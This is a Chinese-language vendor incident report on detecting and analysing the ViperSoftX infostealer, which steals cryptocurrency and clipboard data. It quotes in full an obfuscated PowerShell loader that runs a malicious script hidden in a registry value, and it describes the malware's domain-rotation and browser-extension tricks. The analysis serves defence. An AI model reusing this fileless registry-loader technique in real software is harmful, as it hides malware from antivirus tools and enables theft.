聚銘AISOC對ViperSoftX信息竊取軟件的一次發現、驗證和阻斷處理

聚銘網絡近期在一次對用戶的現場安全運維過程中，利用聚銘下一代智慧安全運營中心（AISOC）監測到了若干惡意域名請求的異常行為。經取證后發現，該惡意軟件名為ViperSoftX，具有多種混合惡意行為。聚銘網絡相關產品報警如下：

圖1 惡意域名響應請求報警

圖2 惡意域名請求列表

經過查詢后，可以看到此類域名已經被標注為惡意，下圖是其中一個域名的相關情報：

圖3 惡意域名情報信息

什么是ViperSoftX

ViperSoftX是一種信息竊取軟件，主要功能為竊取加密貨幣、剪貼板，對受感染的機器進行指紋識別，以及下載和執行任意附加的攻擊載荷或命令。ViperSoftX分發的一個有效載荷為特定的信息竊取器，其形式是基于Chromium的瀏覽器擴展。該惡意擴展通過獲取受害者所訪問頁面的完全控制權限，利用瀏覽器中間人攻擊（MITB）來篡改加密貨幣交易所上的API請求數據，從而控制加密貨幣交易。

此外，ViperSoftX還可以竊取受害者的剪貼板內容，篡改訪問網站上的加密地址，使用MQTT向C&C服務器報告事件等。ViperSoftX主要通過Adobe Illustrator、Corel Video Studio、Microsoft Office等破解軟件進行傳播。

ViperSoftX的攻擊鏈可以總結為以下流程：

圖4 ViperSoftX的攻擊鏈示意

取證過程

在了解了整個攻擊過程后，通過聚銘下一代智慧安全運營中心（AISOC）的取證工具就可以比較輕松地掌握是哪個進程執行了這些域名請求。通過運行取證工具，可以明顯地看到一個Powershell腳本正在執行，如下圖所示：

圖5 腳本執行命令截圖（通過取證工具獲取）

可以看出，這個PS腳本位于“C:\Windows\System32\”路徑下，打開它能看到如下內容：

$hWoZcYCHbzD=[ScriptBlock];$OYjdrEDOZG=[string];$QSIVJlVifNVF=[char]; icm ($hWoZcYCHbzD::Create($OYjdrEDOZG::Join('', ((gp 'HKLM:\SOFTWARE\Khronos8OjteuI').'1NpPEtPF' | % { [char]$_ }))))

很明顯，這個PowerShell執行的真正內容在“HKLM:\SOFTWARE\Khronos8OjteuI”中，如下圖所示：

圖6 被植入在注冊表中的惡意程序腳本

可以看出受攻擊機器的注冊表信息已經被惡意修改，通過解碼被寫入注冊表的內容后，獲取到完整的惡意程序，其中關鍵部分如下：

圖7 請求惡意域名部分

這里使用了一個三重循環，故最多可以變換出50個不同的域名（即2*5*5），以躲避相關安全設備的檢測，但由于其使用的還是有限的域名池，因此在聚銘相關專業設備的幫助下能夠較為容易地偵測出來。

結論
 

聚銘網絡技術人員在現場取證的過程中了解到，客戶被攻擊主機其實安裝了多種殺毒軟件，但在執行查殺時沒有發現任何報警，通過這一點可以充分說明ViperSoftX具有很強地隱蔽性（將其主要惡意部分放入了注冊表值），一般的防護手段難以及時發現。

目前還未準確查明用戶是如何被植入ViperSoftX的，但通過對其執行鏈的分析，推測可能是用戶在上網時下載了包含惡意內容的軟件，從而使主機受到感染。因此小銘哥提醒大家，在上網時要切記網絡安全，請勿下載盜版軟件，避免因一時疏忽成為黑客攻擊的受害者。